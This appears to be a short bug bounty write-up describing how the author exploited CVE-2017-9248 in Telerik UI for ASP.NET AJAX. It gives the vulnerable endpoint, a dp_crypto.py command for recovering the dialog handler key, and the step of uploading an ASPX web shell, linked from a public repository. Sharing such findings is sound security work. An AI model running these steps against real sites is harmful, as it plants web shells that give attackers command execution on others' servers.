Hi folks, Usually I don't do writeups or share anything related to bug bounty. From now I will be sharing my experience and knowledge & hope it will add some value to your Bug Bounty journey ❤
Who I am?
My name is hashir khan aka p4n7h3rx and I’m a Self Learned Penetration Tester & Bug Bounty Hunter. I have performed Penetration Testing on many national and international Banking, Financial, Government, Health, and many tech giant organizations.
Summary
I was hunting on a bug bounty target while fuzzing I saw the website is using Telerik UI and it was vulnerable to Base64-based encryption oracle exploit for CVE-2017–9248 (Telerik UI for ASP.NET AJAX dialog handler). In which the attacker can upload a shell on the website file manager. I have used the dp_crypto tool for exploitation.
Vulnerable Endpoint
Telerik.Web.UI.DialogHandler.aspx
Vulnerability
This exploit attacks a weak encryption implementation to discover the dialog handler key for vulnerable versions of Telerik UI for ASP.NET AJAX, then provides an encrypted link that gives access to a file manager, and arbitrary file upload (e.g. web shell) if remote file permissions allow. Works up to and including version 2017.1.118.
python3 dp_crypto.py k -u https://test.example.com/Telerik.Web.UI.DialogHandler.aspx
After visiting the URL
Now upload the Aspx shell on the file manager .
Shell I used :
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Final Notes:
if you have any queries feel free to reach out to me on Linkedin or Twitter till then happy hacking!
